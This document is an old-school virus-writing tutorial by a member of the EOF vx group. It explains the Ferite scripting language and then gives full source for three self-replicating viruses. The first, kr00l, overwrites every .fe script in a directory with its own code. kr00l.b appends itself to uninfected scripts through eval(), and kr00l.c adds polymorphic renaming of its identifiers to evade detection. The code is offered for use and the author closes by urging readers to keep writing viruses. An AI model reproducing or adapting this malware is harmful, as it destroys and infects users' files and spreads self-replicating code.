|| Author: WarGame/EOF || Back to articles ||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++ Ferite virus writing guide ++++++++++
++++++++++ by WarGame,#eof ++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1) Introduction
2) The language
3) Infection
4) Polymorphism
5) Final words
1) Introduction
This is my first tutorial :) ... It could contain error or other shit so you are free to contact me
and tell me how much I am a d0rk :).
Some time ago browsing on the net I found a nice language called "ferite", this tutorial will ( try to )
explain you how to write auto-replicant programs in that language.
And now it's time to go!!!!
2) The language
Ferite is a mixed language, if you come from C or better C++ you will find it very simple, but you can use it
without any problems even if you are a php or perl programmer.
These are some examples of ferite scripting:
-- HelloWorld.fe --
uses "console";
Console.println("Hello world!");
-- eof --
This is the simplest ferite script, you first need to include the "console" module to do I/O, then we can use
the method Console.println() to print a msg on console.
This is a very simple example of how to use ferite.
== Variables declaration ==
Ferite allows us to declare many types of variables but for our scope we will need only three data types:
string = string data type ( example: string lolo = "R00t"; )
number = integer data type ( example: number i = 0; )
object = useful to instance object class ( example: object current_dir = new Directory("."); )
== FOR-WHILE-IF-ELSE ==
Ferite has the common cycles of the other languages, I will not waste much time on them.
Their structures:
if(condition)
{
some shit ...
}
else
{
other shit ...
}
(note you can use multiple if :))
for(start_condition; condition_to_verify; thing_to_do_at_every_cycle)
{
some code ...
}
while(condition)
{
some code ...
}
== Functions declaration ==
You can declare functions in ferite like any other language, this is the structure of a function:
function function_name(parameters)
{
code to do ...
return some_thing;
}
example code:
function sum(number a,number b)
{
return a + b;
}
This section is finished, go to virus writing !!!
3) Infection
Ok, now it's the moment to make the real shit.
Before starting some useful things:
== Getting script path ==
Example code:
-- GetPath.fe --
uses "console","sys";
string path = Sys.scriptName();
Console.println("My path is: $path");
-- eof --
== Finding victims script ==
-- FindVictims.fe --
uses "console","filesystem","sys";
object current_dir = new Directory(".");
string files = "";
while((files = current_dir.getEntry()) != "")
{
if(String.index(files,".fe") != -1)
{
Console.println("New victim: $files");
}
}
-- eof --
== File I/O ==
-- File_io.fe --
uses "console","sys","filesystem";
File.create("Hello_world.txt").writeln("Hello world!");
-- eof --
This is an overwriter ferite virus that will explain better all these things:
-- kr00l.fe --
// Hi, this is an overwriter virus written in ferite ... its name is kr00l
// by [WarGame,#eof] ... you can get ferite here: http://www.ferite.org
uses "console","sys","filesystem";
// useful objects
object folder = new Directory(".");
string found_file = "";
string my_code = "";
number infections = -1; // to avoid counting itself
// read its code
my_code = File.open(Sys.scriptName()).toString();
// Let's search
while((found_file = folder.getEntry()) != "")
{
// is it a ferite script ?
if((String.index(found_file,".fe")) != -1)
{
File.remove(found_file);
File.create(found_file).writeln(my_code);
infections++;
}
}
if(infections > 0)
{
Console.println("I am kr00l by [WarGame,#eof], [infections:$infections]");
}
-- eof --
== Appending ==
This is the better way to infect a ferite script, I did some experiments with prepending and it didn't work
well, so I tried appending and it seems to work quite well.
Ferite interpreter checks the validity of the source, for example you can't use "uses" twice or declare
variables after functions or other code.
After many hours ( my brain was burning :) ) I found an other way to do it, I used eval().
If you are a perl or php programmer you know what eval() is, it's a function that let you "build" your
code and execute it, for example eval('uses "console"; Console.println("I am in eval()"); ');.
After having this idea kr00l.b was burn and it infected its first victim :)
This is the code:
-- kr00l.b.fe --
eval('uses "filesystem","sys";function Is_Infected(string fl) { string st = File.open(fl).toString(); if(String.index(st,"kr00l.b by [WarGame,#eof]") != -1) {return 1;} else {return 0;}} string signature = "kr00l.b by [WarGame,#eof]";string fl = "";string my_code = "";object pr = File.open(Sys.scriptName());string orig = "";object dir = new Directory("."); while(String.index((my_code = pr.readln()),signature) == -1) {} while((fl = dir.getEntry()) != "") { if(String.index(Sys.scriptName(),fl) == -1 && String.index(fl,".fe") != -1) { if(!Is_Infected(fl)) { orig = File.open(fl).toString(); File.remove(fl); File.create(fl).writeln(orig+my_code); } } } ');
// This is the evolution of the kr00l ferite virus, it appends to victim scripts ... have fun with it by [WarGame,#eof]
-- eof --
How you can see the code is all on one line and it works in a simple way, it finds its victims
in the current directory and appends its code at the end of it.
Nothing of special only some things to note:
if(String.index(Sys.scriptName(),fl) == -1 && String.index(fl,".fe") != -1)
This is to check if a found file is or not a ferite script, but I had to add another condition,
it is to ensure that the virus itself doesn't get infected and so corrupted.
4) Polymorphism
Polymorphism is simple with ferite, you need only the function Regexp.replaceAll(), with this you can change
variables names and functions names to make the virus look different at every infection.
No other things to do only an example of appender virus with poly in it:
-- kr00l.c.fe --
eval('uses "filesystem","sys","regexp","math","string","date";function Is_Infected(string fl) { string st = File.open(fl).toString(); if(String.index(st,"kr00l.c by [WarGame,#eof]") != -1) {return 1;} else {return 0;}} function rnd(number sd) { Math.srand(sd); return String.sprintf("%c%c%c%c",((Math.rand()%10)+65),((Math.rand()%10)+65),((Math.rand()%10)+65),((Math.rand()%10)+65));} string signature = "kr00l.c by [WarGame,#eof]";string fl = "";string my_code = "";object pr = File.open(Sys.scriptName());string orig = "";object dir = new Directory("."); while(String.index((my_code = pr.readln()),signature) == -1) {} if(1) { my_code = Regexp.replaceAll("signature",my_code,rnd(Date.now()+1989)); my_code = Regexp.replaceAll("orig",my_code,rnd(Date.now()+1992)); my_code = Regexp.replaceAll("dir",my_code,rnd(Date.now()+1922)); my_code = Regexp.replaceAll("fl",my_code,rnd(Date.now()+1981)); my_code = Regexp.replaceAll("Is_Infected",my_code,rnd(Date.now()+1975)); my_code = Regexp.replaceAll("rnd",my_code,rnd(Date.now()+1960)); my_code = Regexp.replaceAll("my_code",my_code,rnd(Date.now()+2006));} while((fl = dir.getEntry()) != "") { if(String.index(Sys.scriptName(),fl) == -1 && String.index(fl,".fe") != -1) { if(!Is_Infected(fl)) { orig = File.open(fl).toString(); File.remove(fl); File.create(fl).writeln(orig+my_code); } } } ');
// Evolution of kr00l.b with poly ... its name is kr00l.c ... by [WarGame,#eof]
-- eof --
Like kr00l.b this virus contained only on one line, the poly works in a very simple way, this is an example:
Regexp.replaceAll("signature",my_code,rnd(Date.now()+1989)); , this will change every instance of the variable "signature"
with a random generated string.
The same is made with the other variables and functions.
5) Final words
I would like to thank the other members of EOF, SkyOut for trusting me and for the big discussion on IRC, berniee
and RadiatioN for the help, izee and Nibble for being so friendly with me, and sk0r for his good idea of ransomware.
For contact check http://www.eof-project.net or send me an email to wargame89@yahoo.it
I hope this small tutorial will help you and remember to keep on vxing !!!
"So di non sapere" ( Socrate )